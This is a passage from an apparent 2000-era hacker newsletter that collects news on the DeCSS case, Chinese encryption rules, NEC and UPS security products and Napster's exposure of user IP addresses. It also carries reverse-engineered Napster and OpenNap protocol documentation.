phone and some CDs and then charged Johansen with breaking security to gain unauthorized access to data or software. He and his father, whose company's Web site was used to post the program, also were charged with copyright infringement. The son and father face two to three years in prison and fines if convicted. Johansen said that several people developed the program to allow users to play DVDs on various PCs. The effort is described on OpenDVD.org. "Our goal was to make it possible to watch DVDs under the Linux operating system," Johansen wrote in an email. In the wake of the release of DeCSS, the film industry has vigorously tried to stamp out the program. The Motion Picture Association of America (MPAA) filed a lawsuit in New York against individuals who allegedly posted the program on their Web sites; the organization also is a founder of the DVD Copy Control Association, which filed a similar lawsuit in California. The judges in both cases have issued preliminary injunctions prohibiting the defendants from posting the code through the duration of the trials. But Johansen argues that the MPAA has misled the public into believing that his program allows people to more easily copy DVDs. "The (motion picture industry) is claiming that their encryption was copy protection," he said. "The encryption is in fact only playback protection, which gives the movie industry a monopoly on who gets to make DVD players." The Electronic Frontier Foundation, which is defending the parties in both cases, argues that people have a right to discuss the "the technical insecurity of DVD" and demonstrate their points through reverse engineering. The DVD association was formed in December of last year by companies that also are members of the MPAA, the Business Software Alliance and the Electronic Industries Alliance to license out the DVD Content Scrambling System. -=- Aftenposten; (NO response from host at print time) -=- EFF; FOR IMMEDIATE RELEASE January 25, 2000 Norwegian Teen Becomes Industry's Latest Test Case Motion Picture Industry Continues Campaign Against Open Source Software Community Over DVD Security San Francisco -- The home of a Norwegian teenager was raided by the police today acting at the behest of the motion picture industry intent on suppressing discussion and distribution of DVD-viewing software developed outside of industry's monopoly on such software. This action follows closely three lawsuits filed by the industry in California, New York, and Connecticut against numerous individuals and organizations including coders, journalists, an ISP, and numerous Netizens. "The motion picture industry is using its substantial resources to intimidate the technical community into surrendering rights of free expression and fair use of information," said Tara Lemmey, Executive Director of the Electronic Frontier Foundation. "These actions are a wake-up call for the technical community. The process of reverse-engineering and public posting and commenting of code that the MPAA is attempting to suppress is fundamental to the development of commercial and open source software." Sixteen-year-old Jon Johansen, who was among the first to post the DeCSS program that allows users to view DVDs on computers not using Windows or Macintosh operating systems, had his computer and cellular telephone seized by police. Both he and his father were questioned at length by the police and have been threatened with indictment for posting the code, which the motion picture industry claims was illegally created. According to several international legal experts contacted by EFF, the industry is relying on untested legal theory in its case against Johansen. With regard to the industry's use of Norwegian Criminal Code sect 145(2), a provision making it illegal to "break a security arrangement" to access data, experts agree that it is not clear whether it can apply to a situation where someone breaks a security system to access material on a device of which that person is the owner. The second charge of contributory copyright infringement, as likely to be argued in this case, has also not been before the Norwegian courts. The actions being brought by the motion picture industry have attracted the attention of the Global Internet Liberty Campaign (GILC), a coalition of over 50 international civil liberties and human rights groups. "We believe that intellectual property owners should not be allowed to expand their property rights at the expense of free speech, legal reverse-engineering of software programs for interoperability reasons, and discussions of technical and scientific issues on the Internet," wrote GILC members in a statement released last week. "DVD-CCA's lawsuit is in direct conflict with United Nations human rights accords and the First Amendment of the United States Constitution." (EFF is a GILC member.) EFF will continue fighting the industry's attempts to censor Web sites discussing DVD technology, including assisting Johansen and his family in finding legal representation in Norway. All of these steps are part of EFF's Campaign for Audiovisual Free Expression (CAFE), which it launched last summer to address complex societal and legal issues raised by new technological measures for protecting intellectual property rights. For complete information on the MPAA and DVD-CCA cases, see: http://www.eff.org/IP/Video To learn more about EFF's Campaign for Audiovisual Free Expression, see: http://www.eff.org/cafe For information on the Global Internet Liberty Campaign, see: http://www.gilc.org The Electronic Frontier Foundation ( http://www.eff.org ) is a leading global nonprofit organization linking technical architectures with legal frameworks to support the rights of individuals in an open society. Founded in 1990, EFF actively encourages and challenges industry and government to support free expression, privacy, and openness in the information society. EFF is a member-supported organization and maintains one of the most-linked-to Web sites in the world. [end] @HWA 58.0 HNN: Jan 26: China To Require Crypto Registration ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Starting next Monday Chinese government officials will require that all businesses operating within China must register the type of commercial encryption software they use. The regulations also bar Chinese companies from buying products containing foreign-designed encryption software. US National Newspaper - via Cryptome http://cryptome.org/cn-crypto.htm 25 January 2000. Thanks to Anonymous. Source: US national newspaper, January 25, 2000 Foreigners Must Disclose Internet Secrets to Beijing Soon Encryption Rules For Firms Threaten Growth of the Web By MATT FORNEY BEIJING -- The Chinese government is about to require foreign firms to reveal one of their deepest secrets -- the type of software used to protect sensitive data transfers over the Internet. By next Monday, foreign and Chinese companies must register the type of commercial encryption software they use. Such software makes it more difficult for hackers -- or governments -- to eavesdrop on electronic messages. Eventually, the companies must provide details of employees who use the software, making it easier for authorities to monitor personal and commercial use of the Internet. In addition, the regulations bar Chinese companies from buying products containing foreign-designed encryption software. A strict interpretation would include such products as Netscape browsers or Microsoft Outlook, as well as the more complex equipment vital for conducting business securely over the Internet. The rules are the latest sign of Beijing's unease with the Internet, which has been used by dissidents and members of the banned sect Falun Dafa to communicate and spread information. Authorities have tried to block sites and require users to register, but the number of users continues to rise and now totals about nine million. The new rules, however, could slow the Internet's groswth here. If companies offering electronic business services worry that the Chinese government is monitoring their transmissions, they could relocate outside China's borders, where they wouldn't have to reveal the type of encryption software they use. "This is sending the wrong message to foreign investors," says Patrick Powers director of China operations for the U.S.China Business Council, who adds that "the foreign business community is deeply concerned." So is the U.S. government, which recently approved the export of many types of encryption software. Commerce Secretary William Daley plans to raise the issue with senior Chinese officials this week in Switzerland during the annual World Economic Forum. China revealed the new regulations on Oct. 15, in an order published in the Communist Party's flagship newspaper, the People's Daily. It demanded that "foreign organizations or individuals using encryption products or equipment containing encryption technology in China must apply" for permission by Jan. 31. It exempted diplomatic missions. After meeting that application deadline, foreign companies must fill out a second round of paperwork. According to a copy of the forms, companies must name employees who are using encryption software and give the location of the computers they use, as well as their e-mail addresses and telephone numbers. The order adds that "no organization or individual can sell foreign commercial encryption products." If enforced, the regulations would certainly complicate the development of the Internet in China. Most of the routers and servers that compose the nerve center of China's networks come from foreign companies. and often include encrypted software to ensure secure communications. The rules could force delays in network construction as Chinese software companies struggle to expand their encryption services. "If IBM or Hewlett-Packard wants to sell an e-commerce Web server to China, it might have to isolate which parts relate to security" and then find Chinese companies to write the software, says Jay Hu, director of the Beijing branch of the U.S. Information Technology Office, an industry research group. "I don't think Chinese companies have that ability." Neither International Business Machines Corp. nor Hewlett Packard Co. would comment. The encryption regulations could apply to just about anything that transmits sensitive digital information, including cell phones, Internet browsers and e-mail software. Microsoft's Outlook program uses low-level encryption, and the company might have to seek Chinese partners to design it anew. Alick Yan, a spokesman for Microsoft (China) Co., said it's too early to gauge the potential impact. The government has created a new agency to enforce the regulations, but it isn't clear who controls the body. "We report to the State Council," which is China's cabinet, explained director Yang Lingjun, who declined to comment further. However many foreign-company officials, speaking anonymously, say they're afraid the organization is staffed by the Ministry of State Security, China's secret police. @HWA 59.0 HNN: Jan 26: NEC Develops Network Encryption Technology ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid NEC Corp said on Wednesday it developed a new encryption technology to protect data on the Internet and other networks. The new technology, Cipherunicorn-A, creates several false keys in addition to the true encryption key, making it especially difficult for potential intruders to crack. Reuters - via Yahoo Wednesday January 26, 5:43 am Eastern Time NEC develops encryption technology for networks TOKYO, Jan 26 (Reuters) - NEC Corp said on Wednesday it developed a new encryption technology to prevent hackers from tapping into business-to-consumer exchanges on the Internet and other networks. The new technology, Cipherunicorn-A, creates several false keys in addition to the true encryption key, making it especially difficult for potential intruders to crack, NEC said. The technology also features a dynamic encryption code that can use key lengths of 128, 192 or 256 bits, offering higher levels of security than conventional methods with a fixed length of 128 bits, an NEC spokesman said. The electronics maker aims to develop software utilising the new technology as soon as possible, he said, although he gave no specific time frame. Worries about Internet hackers were heightened in Japan this week after humiliating raids on government Web sites, in which hackers linked one to a pornographic site and attacked the nation's war record on another. @HWA 60.0 HNN: Jan 26: UPS announces Worldtalk secure email. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench From HNN http://www.hackernews.com/ UPS has announced the launch of Worldtalk, a product aimed at securing corporate e-mail while in transit. It also claims to block SPAM and Viruses. UPS is offering companies up to $100,000 for business losses as part of its customer assurance plan when using UPS Document Exchange. (There is so much hype and marketing fluff in this press release it is hard to pick out the facts. On the surface this looks like nothing more than a glorified SSL package.) United Parcel Service http://www.ups.com/bin/shownews.cgi?20000124badnews Bad News for Hackers, Crackers Worldtalk, UPS Combine Powerful Security Solutions to Safeguard Critical Information SANTA CLARA, Calif. and ATLANTA, Ga., Jan. 24, 2000 -- Worldtalk and UPS today announced the launch of a cutting edge security product combining industry-leading solutions to protect critical business information on a company's Web site or in transit via e-mail. The new product, WorldSecure/Mail for UPS OnLine Courier, integrates Worldtalk's award-winning WorldSecure products with UPS Document Exchange for a lethal one-two punch against hackers or crackers looking to gain access to confidential information on the Web. Worldtalk's award-winning WorldSecure products, based on the WorldSecure policy management platform, enable organizations to define and enforce content security policies for e-mail and the Web. Worldtalk's products provide organizations with the ability to reduce corporate liability, secure intellectual property, guarantee confidentiality of communications with trading partners and protect network resources. WorldSecure/Mail ensures the confidentiality and privacy of Internet communication, protects information assets, and blocks viruses and SPAMs. UPS Document Exchange guards sensitive information in transit between one organization's server and another's. Armed with 128-bit encryption on the server and optional password protection, UPS Document Exchange offers secure, trackable electronic delivery of anything that can be contained in a digital file, including documents, images and software, along with definitive proof of delivery. Combined, the two products allow an organization to establish criteria by which specific types of sensitive documents or information can leave its network only via UPS Document Exchange - and are automatically converted into a secure UPS Document Exchange digital package before sending. Meanwhile other, less sensitive information can still be sent by conventional e-mail. Both companies will sell the integrated solution. As an added security measure, UPS is putting its money where its mouth is by offering companies up to $100,000 for business losses as part of its customer assurance plan when using UPS Document Exchange. Solutions that protect the security of sensitive documents become even more important as businesses communicate more frequently over the Internet. By the year 2001, 35 percent of business documents - 21 million per day - will move via the Internet, according to the Aberdeen Group. "With the combination of WorldSecure and UPS Document Exchange, organizations can ensure their sensitive documents won't be floating around unprotected in the wildly unsecure world of e-mail," said Kim Marchner, Group Manager for UPS Document Exchange Marketing. "An organization has the power to define which types of documents - like prospectuses or confidential reports from its legal department - will be required to carry the protection of Document Exchange when leaving the server." An important feature of UPS Document Exchange is its ease of use by both sender and receiver. Unlike unwieldy encryption programs that require the sender and recipient to have the same type of encryption software, Document Exchange requires only that the sender have a standard e-mail package, and the receiver have a standard Web browser. "Organizations want to leverage the economy, efficiency and ubiquity of Internet e-mail," said Jim Heisch, President and CFO, Worldtalk. "Solutions like WorldSecure/Mail and UPS Document Exchange allow them to simply and efficiently define and enforce policies that ensure the safe use of their e-mail systems." UPS Document Exchange, launched in June 1998, is a secure Internet communications service for business-to-business commerce based on Tumbleweed Communication Corp.'s Integrated Messaging Exchange (IME technology. Tumbleweed Integrated Messaging Exchange (IME) is a set of products and services that leverage the Internet and existing e-mail to create a secure, trackable online communications channel. Thousands of businesses are currently using UPS Document Exchange to securely move critical documents, images and software over the 'Net. About Worldtalk Worldtalk Corporation is a leading provider of policy enforcement solutions for e-mail and Web communications. The company's WorldSecure policy management platform complements existing firewalls by enabling organizations to enforce usage policies for all Internet e-mail and Web communications. Worldtalk delivered the industry's first integrated solution for managing and enforcing e-mail security policies in September 1997. Since then, organizations have purchased WorldSecure solutions to ensure confidentiality of their external e-mail communications, protect their intellectual property, prevent SPAMs and viruses, and reduce the legal liabilities associated with Internet communications. Worldtalk products include WorldSecure/Web and the award-winning WorldSecure/Mail (previously known as WorldSecure Server), which are marketed and sold worldwide by Worldtalk, Value Added Resellers (VARs) and distributors. For more information, please visit us at http://www.worldtalk.com. About UPS United Parcel Service, the world's largest express carrier and package delivery company, is a leading commerce facilitator, offering an unmatched array of traditional and electronic commerce services. By offering fully integrated, web-enabled business-to-business solutions and working with other e-commerce leaders, UPS is changing the way people do business. The company has won numerous awards for its Web site and information technology infrastructure, including two Computerworld Smithsonian Awards. The Atlanta-based company operates in more than 200 countries and employs more than 330,000 people worldwide. UPS reported 1998 annual revenues of $24.8 billion. You can visit the UPS web site at www.ups.com. For more information, contact: Angela McMahon - UPS - 404-828-6840 amcmahon@ups.com Shannon Hakesley - Worldtalk - 408-567-5141 shannon.hakesley@worldtalk.com @HWA 61.0 HNN: Jan 27: Napster Reveals Users Info ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This seems like a very convenient and timely accident, I wonder if it wasn't engineered or leaked. This is the reason I didn't register with napster and haven't used it. Trust noone. - Ed From HNN http://www.hackernews.com/ contributed by acopalyse The popular MP3 trading software, Napster, may have a security hole. Internet security consultant Richard Smith, has found that Napster logs users' IP numbers. This information could be used to help copyright owners identify and try to prosecute Napster users who may be illegally trading music files. C|Net http://news.cnet.com/news/0-1005-200-1532962.html?tag=st.ne.1002.bgif?st.ne.fd.gif.j (BTW this link looks wacked out but it is legit - Ed) Security problem discovered in Napster music software By Paul Festa Staff Writer, CNET News.com January 26, 2000, 3:30 p.m. PT Those who use Napster's popular software for trading digital music files may not be as anonymous as they think they are. Napster's program, which lets users see which digital music files other users possess, also exposes their Internet Protocol addresses, according to Internet security consultant Richard Smith. IP addresses are unique strings of numbers that identify users' computers on the Internet. That could help copyright owners identify and try to prosecute Napster users who may be illegally swapping music. "Napster has a problem," he said. "It's serious in the sense that they have exposed their users to legal risk." Napster acknowledged the problem but minimized its importance, saying that IP addresses are not easily procurable except by experienced network experts or hackers, and that individual IP addresses are more often than not obscured behind corporate or Internet service provider firewalls and proxy servers. "With our product, when you transfer from point to point, the IP address is available to you," said Eddie Kessler, Napster's vice president of engineering. "It's something that a hacker might have access to. In most cases, tracing an individual user would not be possible, but it is possible." Smith noted that IP addresses are traceable to individuals about a third of the time. Napster said it is working on hiding its users' IP addresses. "We're evaluating various technologies that would provide an even higher level of security to our users," Kessler said. "Specifically, they would not make your IP address visible to the person who was downloading content to you." Kessler would not say when the company expects to implement those changes. The trend in digital music copyright enforcement has been to target companies and larger institutions like universities rather than individuals. Napster itself is the target of a lawsuit by the Recording Industry Association of America (RIAA), which accused the company of "facilitating piracy" through its forum for letting online users trade unauthorized music files directly from their PCs. Another company under legal fire from the RIAA is music Web site MP3.com. Smith said he discovered the Napster security flaw after examining the documentation posted to the Web this week by Stanford University senior David Weekly. Weekly's post irked Napster, which asked him to pull the page. Weekly declined and encouraged the page's dissemination. Today Kessler said the matter with Weekly will rest there. "We're not going to play the DVD DeCSS game and try to shut it down," Kessler said, referring to the recent controversy over a piece of software called DeCSS that lets users circumvent copyright controls on DVDs. The Motion Picture Association of America has gone after sites to force them to take down copies of the tool. (Lets face it, if the fedz want to shut you down, you're toast they just don't put this on a priority level high enough to assign their limited man power to. There are bigger fish to fry, hackers aren't the only users of sniffers and anyone can arp -a netstat -a to see active connections...) @HWA Following up on this here's Weekly's site url http://david.weekly.org/ and here's the Napster breakdown (other info available on his site). I was asked to take this article down, but I politely declined. Since then, I've been informed that things will not escalate. For some strange reason, this writeup got mentioned on slashdot and news.com, although why beats the heck out of me. Yet To Discover How account setup is managed Administrative commands More details about sending/receiving files When "User Error" or such messages are sent january 26, 2000 corrected a few tidbits january 23, 2000 initial document release Network Configuration Napster appears to have cubes at globalcenter and at AboveNet Their main router at abovenet is 208.184.213.7 redirect servers: (server.napster.com:8875) 208.184.216.222 208.184.216.223 servers: 208.178.163.61 (globalcenter) 208.178.175.130-4 (globalcenter) 208.184.216.202,204-209,211-215,217-221 (abovenet @ sjc2:colo8) 208.49.239.242,7,8 (globalcenter) ports: 4444,5555,6666,7777,8888 Interesting. Looks like their general strategy is to cluster in units of 5 IP block (corresponding to grouped rackmounts?) with 5 sets of port numbers for process redundancy on the servers. I bet they started with GlobalCenter, but decided to move in with Abovenet at their SJC2 colocation facility, now that they have their stuff together. That's where the organized clusters are. The Globalcenter unit looks like it's not in California, but connected via an OC48 line to Globalcenter's Herdon, VA node. (Thanks to Ben Byer!) Protocol Breakdown Initial Connection DNS lookup server.napster.com SYN (connect) -> 208.184.216.222 [connects port 8875 on server to 1876 locally] RECEIVED 80 bytes of data: "208.49.239.247:5555" (zero-padded) RECEIVED 6 0-bytes (Keepalive/synch) RESPONDS with 2 0-size packets (ACK) SYN (connect) -> 208.49.239.247 [connects port 5555 (surprise) to port 1877 locally] SENT to server: 28 00 02 00 username password 23 "v2.0 BETA 5" 10 4398560 RECEIVED 6 0-bytes RECEIVED 10 00 00 00 "Invalid Password" RECEIVED 6 0-bytes connects again to main server, who suggests 208.178.175.133:8888 this time (fails) connects again to main server, who suggests 208.184.216.204 (succeeds) RECIEVES 00 00 10 00 03 00 anon@napster.com SENT 0A 00 0D 00 nuprin1715 RECEIVED 0E 00 D6 00 "979 147566 587" Request for Chat List SENT 00 00 69 02 (CHATLIST REQ) RECEIVED 26 00 6A 02 "Lobby 33 Welcome to the Lobby channel" 2E 22 00 6A 02 "Rap 27 Welcome to the Rap channel 2E 23 00 6A 02 "Game 0 Welcome to the Game channel" 2E 24 00 6A 02 "Rock 14 Welcome to the Rock channel" 2E 35 00 6A 02 "International 1 Welcome to the International channel" 2E ... 35 00 6A 02 "RadioVersions 0 Welcome to the RadioVersions Channel" 2E 00 00 69 02 (CHATLIST REQ) Joining a Channel SENT 06 00 90 01 "Trance" (JOIN REQUEST) RECEIVED 00 00 00 00 00 00 (SYNC) 06 00 95 01 "Trance" (JOIN GRANTED) 1B (string size) 00 98 01 "Trance username #songs conn#" (USER LISTING) ... 06 00 99 01 "Trance" (CHANNEL NAME) 25 00 9A 01 "Trance Welcome to the Trance channel" 2E (CHANNEL DESC) connection types: 10 = T3 (or greater) 9 = T1 8 = DSL 7 = Cable modem 6 = 128k ISDN 5 = 64k ISDN 4 = 56k Modem 3 = 33.6 Modem 2 = 28.8 Modem 1 = 14.4 Modem 0 = Unknown Talking on a Channel SENT 0C 00 92 01 Trance hello (size 00 92 01 channel message) RECEIVED 12 00 93 01 Trance myusername hello (size 00 93 01 channel user message) Private Messages SENT 0B 00 CD 00 myusername hello (size 00 cd 00 touser message) RECEIVED 0B 00 CD 00 myusername hello (size 00 cd 00 fromuser message) Whois Requests SENT 05 00 5B 02 username RECEIVED 3D 00 5C 02 username "User" 6025 "Trance " "Active" 127 0 0 10 "v2.0 BETA 5" Leaving a Chat Room SENT 06 00 91 01 Trance RECEIVED [6-byte ack] Searching for Songs SENT 41 00 C8 00 FILENAME CONTAINS "aaaa" MAX_RESULTS 123 LINESPEED "AT BEST" 8 BITRATE "AT LEAST" "128" FREQ "EQUAL TO" "32000" RECEIVED 00 00 CA 00 00 00 (NO RESULT) RECEIVED (on different query) 81 00 C9 00 "c:\WINDOWS\DESKTOP\mp3s\Nirvana-Lithium.mp3" (32-byte checksum) (size in bytes) (bitrate in kbps) (freq) (duration in seconds) (username) (magic cookie - "643813570") (line speed) 92 00 C9 00 "G:\Program Files\napster\Music\NIRVANA - Smells Like Teen Spirit.mp3" (32-byte checksum) ... 00 00 CA 00 00 00 [GASP!] Napster SENT the COMPLETE location of the file!!!! Does this mean that there is a way to coax the client to offer up ANY file? NOTE: ping time requirements not SENT to server (duh). Hotlisting a User SENT 0E 00 CF 00 username RECEIVED 0E 00 2D 01 username (user is online) 10 00 D1 00 username (user added to hotlist) Listing a User's Files SENT 0E 00 D3 00 username RECEIVED 85 00 D4 00 username "D:\Nyhemladdade mp3 or\POWER-BEAT - Dance Club Megamixes.mp3" (32-byte checksum) (size in bytes) (kbps) (freq) (length in seconds) ... (size) 00 D5 00 (username) (= END OF RESULTS) Requesting a File SENT 2A 00 CB 00 username "C:\MP3\REM - Everybody Hurts.mp3" RECEIVED 5D 00 CC 00 username 2965119704 (IP-address backward-form = A.B.C.D) 6699 (port) "C:\MP3\REM - Everybody Hurts.mp3" (song) (32-byte checksum) (line speed) [connect to A.B.C.D:6699] RECEIVED from client 31 00 00 00 00 00 SENT to client GET RECEIVED from client 00 00 00 00 00 00 SENT to client Myusername "C:\MP3\REM - Everybody Hurts.mp3" 0 (port to connect to) RECEIVED from client (size in bytes) SENT to server 00 00 DD 00 (give the go-ahead thru server) RECEIVED from client [DATA] Sending a File [no information yet] General Packet Format [chunksize] [chunkinfo] [data...] CHUNKSIZE: Intel-endian 16-bit integer size of [data...] in bytes CHUNKINFO: (hex) Intel-endian 16-bit integer. first byte: 00 - login rejected 02 - login requested 03 - login accepted 0D - challenge? (nuprin1715) 2D - added to hotlist 2E - browse error (user isn't online!) 2F - remove user from hotlist OR user is offline 5B - whois query 5C - whois result 5D - whois: user is offline! 69 - list all channels 6A - channel info 90 - join channel 91 - leave channel 92 - send text to channel 93 - receive text from channel 94 - user error 95 - join request granted 96 - user has joined channel 97 - user has left channel 98 - username entry for list 99 - channel name announcement 9A - channel description C8 - send search query C9 - query result CA - end of query results CB - request file CC - download reply CD - send/receive private message CE - download error (they hung up!) CF - add user to hotlist D1 - user is online (on hotlist) D3 - query user's file listings D4 - listing entry D5 - end of entries D6 - update from server (SONGS USERS GIGABYTES) DA - begin transmssion? DD - starting to transmit? F4 - Give push goahead (when connect port is 0) When you're requesting a file from another client, and they ask you to connect to port ZERO, they don't want you to pull the file from them; they want to push the file to you directly. If you receive this, send a 0-length F4 (Give Push Goahead) to the Napster server, and the other client will connect to you. (More tech info in next article - Ed) @HWA 62.0 Dissecting the Napster system ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ More info following up from previous article Source:http://opennap.sourceforge.net/napster.txt napster messages ================ by drscholl@users.sourceforge.net February 1, 2000 0. Forward This is meant to be an open specification. If you find errors or know of additional functionality not described hereafter, please send me email. It benefits the entire community to have a complete and accurate protocol specification. Not only does it allow for clients to be developed for any platform, but also decreases the strain on the server having to parse out bad client messages. Disclaimer: the following information was gathered by analyzing the protocol between the linux nap client and may not resemble the official windows client protocol. 1. Client-Server protocol each message to/from the server is in the form of <length><type><data> where <length> and <type> are 2 bytes each. <length> specifies the length in bytes of the <data> portion of the message. Be aware that <length> and <type> appear to be in little-endian format (least significant byte goes first). For example, in the C language you would encode the number 1 as const unsigned char num[2] = { 0x01, 0x00 }; and 256 would be encoded as const unsigned char num[2] = { 0x00, 0x01 }; [The above is for illustrative purposes only, there are much quicker ways to actually encode a number. -ed] Note that in many cases, strings are passed as double-quoted entries. For example, filenames and client id strings are always sent as "random band - generic cowboy song.mp3" or "nap v0.8" Where required, double quotes are used in the description of the messages below. Some additional information about use of quotes inside of quotes: > The answer is, no, it doesn't do escaping of quotes. If you try searching > for the phrase 'a "quoted" string' on the windows client, you get no songs > found, and "invalid search request" printed in yellow in your console > window. (don't know what code that is, sorry.) > > and no wonder-- a little birdie told me that the client sends this: > > FILENAME CONTAINS "a "quoted" string" MAX_RESULTS 100 [contributed by Ben Byer <bbyer@rice.edu>. -ed] Note that unlike the IRC protocol, each line does NOT end in \r\n. The <length> field specifies exactly how much data you should read. 2. Message Types The following section describes the format of the <data> section for each specific message type. Each field is denoted with <>. The fields in a message are separated by a single space character (ASCII 32). Where appropriate, examples of the <data> section for each message are given. <type> can be one of the following (converted to big-endian): 0 error message [SERVER] <message> 2 client login message [CLIENT] <username> <password> <port> "<client-info>" <link-type> <port> is the port the client is listening on for data transfer. if this value is 0, it means that the client is behind a firewall and can only push files outward. it is expected that requests for downloads be made using the 500 message (see below) <client-info> is a string containing the client version info <link-type> is an integer indicating the client's bandwidth 0 unknown 1 14.4 kbps 2 28.8 kpbs 3 33.6 kbps 4 56.7 kbps 5 64K ISDN 6 128K ISDN 7 Cable 8 DSL 9 T1 10 T3 or greater Example: foo badpass 6699 "nap v0.8" 3 3 login ack [SERVER] <email> the server sends this message to the client after a succesful login (2). If the nick is registered, the <email> address given at registration time is returned. If the nick is not registered, a dummy value is returned. 4 ??? [CLIENT] <n> the latest napster v2.0beta5a sends this prior to login. 6 alternate login format [CLIENT] this message is used when logging in for the first time after registering (0x07) a nick <nick> <pass> <port> "<client-info>" <linkspeed> <email-address> note: this message is similar to the 0x02 message, with the addition of <email-address> on the end Example: foo foo 6699 "nap v0.8" 3 email@here.com 7 client registration message [CLIENT] <nick> this message is sent to create an account response to this message is one of 8, 9 or 10 8 registration success [SERVER] the server sends this when the clients request to register a new nickname has succeeded. 9 nickname already registered [SERVER] the server sends this message when the nickname the client has requested has already been registered by another user 10 invalid nickname [SERVER] this server sends this message when the client attempts register an invalid nickname [what defines an invalid nickname? -ed] 11 ??? [CLIENT] [returns "parameters are unparsable" -ed] 14 login options [CLIENT] NAME:%s ADDRESS:%s CITY:%s STATE:%s PHONE:%s AGE:%s INCOME:%s EDUCATION:%s 100 client notification of shared file [CLIENT] "<filename>" <md5> <size> <bitrate> <frequency> <time> <md5> see section "MD5" <size> is bytes <bitrate> is kbps <frequency> is hz <time> is seconds Example: "generic band - generic song.mp3" b92870e0d41bc8e698cf2f0a1ddfeac7 443332 128 44100 60 102 remove file [CLIENT] <filename> client requests to remove file from shared library 200 client search request [CLIENT] [FILENAME CONTAINS "artist name"] MAX_RESULTS <max> [FILENAME CONTAINS "song"] [LINESPEED <compare> <link-type>] [BITRATE <compare> "<br>"] [FREQ <compare> "<freq>"] The artist name and the song name are, obviously, treated the same by the server; confirm this for yourself on the windows client. max is a number; if it is greater than 100, the server will only return 100 results. <compare> is one of the following: "AT LEAST" "AT BEST" "EQUAL TO" <link-type> see 0x02 (client login) for a description <br> is a number, in kbps <freq> is a sample frequency, in Hz The windows client filters by ping time inside the client. It pretty much has to, and it's easy to see the result by setting ping time to at best 100 ms or so, and max search terms to 50. You'll get back like 3 results, but the client will still tell you that it found "50 results". Examples: FILENAME CONTAINS "Sneaker Pimps" MAX_RESULTS 75 FILENAME CONTAINS "tesko suicide" BITRATE "AT LEAST" "128" MAX_RESULTS 100 FILENAME CONTAINS "Ventolin" LINESPEED "EQUAL TO" 10 [Thanks to Ben Byer <bbyer@rice.edu> for this contribution. -ed] 201 search response [SERVER] "<filename>" <md5> <size> <bitrate> <frequency> <length> <nick> <ip> <link-type> <md5> see secton "MD5" <size> is file size in bytes <bitrate> is mp3 bit rate in kbps <frequency> is sample rate in hz <length> is the play length of the mp3 in seconds <nick> the person sharing the file <ip> is an unsigned long integer representing the ip address of the user with this file <link-type> see message client login (2) message for a description Example: "random band - random song.mp3" 7d733c1e7419674744768db71bff8bcd 2558199 128 44100 159 lefty 3437166285 4 202 end of search response from server [SERVER] no data. 203 download request [CLIENT] <nick> "<filename>" client requests to download <filename> from <nick>. client expects to make an outgoing connection to <nick> on their specified data port. Example: mred "C:\Program Files\Napster\generic cowboy song.mp3" SEE ALSO: 500 alternate download request 204 download ack [SERVER] <nick> <ip> <port> "<filename>" <md5> <linespeed> server sends this message in response to a 203 request. <nick> is the user who has the file <ip> is an unsigned long integer representing the ip address <port> is the port <nick> is listening on <filename> is the file to retrieve <md5> is the md5 sum <linespeed> is the user's connection speed (see login(2)) Example: lefty 4877911892 6699 "generic band - generic song.mp3" 10fe9e623b1962da85eea61df7ac1f69 3 205 private message to/from another user [CLIENT, SERVER] <nick> <message> note the same type is used for a client sending a msg or recieving one [Commentary: this message causes problems if you consider linking servers together. With the current one server situation, the server just rewrites the message it receives with the name of the client that sent it and passes it to the recipient client. However, in the case where the recipient and sender are not on the same server, there is loss of information without encapsulating it. It would have been better to put both the sender and recipient because if the servers are ever linked they will have to make a new message type for this situation. -ed] 206 get error [SERVER] <nick> <filename> the server sends this message when the file that the user has requested to download is unavailable (such as the user is not logged in). 207 add hotlist entry [CLIENT] <user> client is requesting notification when <user> logs in or out. 209 user signon [SERVER] <user> <speed> server is notifying client that a user in their hotlist, <user>, has signed on the server with link <speed> 210 user signoff [SERVER] <user> server is notifying client that a user on their hotlist, <user>, has signed off the server. this message is also sent by the server when the client attempts to browse a nonexistent client. [why don't they just use 404 for this? -ed] 211 browse a user's files [CLIENT] <nick> the client sends this message when it wants to get a list of the files shared by a specific client 212 browse response [SERVER] <nick> "<filename>" <md5> <size> <bitrate> <frequency> <time> <nick> is the user contributing the file <filename> is the mp3 file contributed <md5> is the has of the mp3 file <size> is the file size in bytes <bitrate> is the mp3 bitrate in kbps <frequence> is the sampling frequency in Hz <time> is the play time in seconds Example: foouser "generic band - generic song.mp3" b92870e0d41bc8e698cf2f0a1ddfeac7 443332 128 44100 60 213 end of browse list [SERVER] <nick> indicates no more entries in the browse list for <user> 214 server stats [CLIENT, SERVER] client: no data server: <users> <# files> <size> <size> is approximate total library size in gigabytes this message is sent by the server occasionaly without request Example: 553 64692 254 215 request resume [CLIENT] <checksum> <filesize> client is requesting a list of all users which have the file with the characteristics. the server responds with a list of 216 messages for each match, followed by a 217 message to terminate the list 216 resume search response [SERVER] <user> <ip> <port> <filename> <checksum> <size> <speed> this message contains the matches for the resume request (215). the list is terminated by a 217 message. 217 end of resume search list [SERVER] no data. this messag terminates a list of 216 messages initiated by a 215 client request 218 downloading file [CLIENT] no body. client sends this message to the server to indicate they are in the process of downloading a file. this adds 1 to the download count which the server maintains. 219 download complete [CLIENT] no body. client sends this message to the server to indicate they have completed the file for which a prior 218 message was sent. this subtracts one from the download count the server maintains 220 uploading file [CLIENT] no body. client sends this message to indicate they are uploading a file. this adds one to the upload count maintained by the server. 221 upload complete [CLIENT] no body. client sends this message when they are finished uploading a file. this subtracts one from the upload count maintained by the server. 301 hotlist ack [SERVER] <user> server is notifying client that <user> has successfully be added to their hotlist 302 hotlist error [SERVER] <user> server is notifying client that it was unable to add <user> to their hotlist. [can you only add registered nicks to your hotlist? -ed] 303 remove user from hotlist [CLIENT] <user> client is notifying the server that it no longer wishes to request notifications about <user> when they sign on or off the server. no response is sent in return. 400 join channel [CLIENT] <channel-name> the client sends this command to join a channel 401 part channel [CLIENT] <channel-name> the client sends this command to part a channel 402 send public message [CLIENT] 